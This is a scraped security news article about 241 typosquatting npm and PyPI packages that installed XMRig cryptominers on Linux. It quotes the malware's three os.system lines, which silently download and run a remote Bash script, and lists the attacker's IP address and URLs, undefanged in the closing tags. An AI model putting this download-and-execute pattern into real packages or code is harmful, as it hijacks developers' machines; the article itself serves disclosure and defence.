# 241 npm and PyPI packages caught dropping Linux cryptominers
## More than 200 malicious packages were discovered infiltrating the PyPI and npm open source registries this week. These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.
## Information:

+ Link: https://www.bleepingcomputer.com/news/security/241-npm-and-pypi-packages-caught-dropping-linux-cryptominers/
+ Source: Bleeping Computer
+ Author: Ax Sharma
+ Date published: 19 August 2022, 20:11
+ Date scraped: 19 August 2022, 21:00

## Article:
![Main article image](https://www.bleepstatic.com/content/hl-images/2022/06/10/cryptocurrency-header.jpg)



More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.


These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.


## PyPI, npm flooded with cryptomining packages


Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.


These packages are typosquats of popular open source libraries and commands like [React](https://www.npmjs.com/package/react), [argparse](https://pypi.org/project/argparse/), and [AIOHTTP](https://docs.aiohttp.org/en/stable/), but instead, download and install cryptomining Bash scripts from the threat actor's server.


On Wednesday, software developer and researcher [Hauke Lübbers](https://twitter.com/streamlin3d) shared coming across "[at least 33 projects](https://twitter.com/streamlin3d/status/1560020448515080198)" on PyPI that all launched [XMRig](https://github.com/xmrig), an open source Monero cryptominer, after infecting a system.



![pypi cryptominers](https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/cryptomining-pypi-npm-241/pypi-cryptominers.jpeg)**55 typosquats laced with cryptominers flood PyPI**(Hauke Lübbers)


While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.


"After I reported them to PyPI, they were quickly deleted - but the malicious actor was still in the process of uploading more packages, and uploaded another 22," Lübbers tells BleepingComputer.


"The packages targeted Linux systems and installed crypto mining software XMRig," explains the software engineer.


The Python packages contain the following piece of code that downloads the Bash script from the threat actor's server via Bit.ly URL shortener.


os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")  

os.system("chmod +x .cmc >/dev/null 2>&1")  

os.system("./.cmc >/dev/null 2>&1")
The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.


"This was done by downloading and executing the Bash script from *http://80.78.25[.]140:8000/.cmc"*


Upon execution, the script notifies the threat actor of the IP address of the compromised host and if the deployment of cryptominers succeeded.


At the time of writing, we observed the IP address was down. But, BleepingComputer was able to obtain a copy of the script and we are able to confirm the researcher's claims:



![Bash script installing cryptominers](https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/cryptomining-pypi-npm-241/xmr-script.jpg)**Excerpt from Bash script installing cryptominers**(BleepingComputer)


The Sonatype security research team that I'm a part of, [disclosed](http://blog.sonatype.com/more-than-200-cryptominers-flood-npm-and-pypi-registry) another [186 npm typosquatting packages](https://www.documentcloud.org/documents/22155557-npm-186-packages) today making contact with the same URL to download the malicious Bash script.



![malicious code seen in npm packages](https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/cryptomining-pypi-npm-241/sonatype-npm-malicious-code.jpg)**npm packages pull malicious code from the same URL** (Sonatype)


It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.


Despite various security enhancements, like [mandating two-factor authentication for critical projects](https://www.bleepingcomputer.com/news/security/pypi-mandates-2fa-for-critical-projects-developer-pushes-back/) and introducing new features (like Python's [setuptools moving towards replacing setup.py](http://twitter.com/pradyunsg/status/1557766287194988545)), it seems the open source repository's race against threat actors is only getting even more challenging.


Last week, software security company Checkmarx reported discovering a dozen malicious Python packages [performing DDoS attacks on Counter-Strike servers](https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-aim-ddos-attacks-at-counter-strike-servers/).


Earlier this month, cybersecurity firm CheckPoint [outed 10 malicious PyPI packages](https://www.bleepingcomputer.com/news/security/10-malicious-pypi-packages-found-stealing-developers-credentials/) caught stealing developer credentials.


In July, ReversingLabs researchers disclosed a supply chain attack dubbed [IconBurst](https://www.bleepingcomputer.com/news/security/npm-supply-chain-attack-impacts-hundreds-of-websites-and-apps/) that once again, exploited typosquatting to infect developers.





## Tags:
***ipv4-adresses***: 80.78.25.140
***urls***: https://bit.ly/3c2tMTT http://80.78.25.140:8000 http://Bit.ly http://80.78.25.140:8000/.cmc

### Autogenerated tags:
[[pypi]] [[npm]] [[cryptominers]] [[typosquats]] [[url]] [[linux]] [[lübbers]] [[bleepingcomputer]] [[os.system]] [[>/dev/null]]
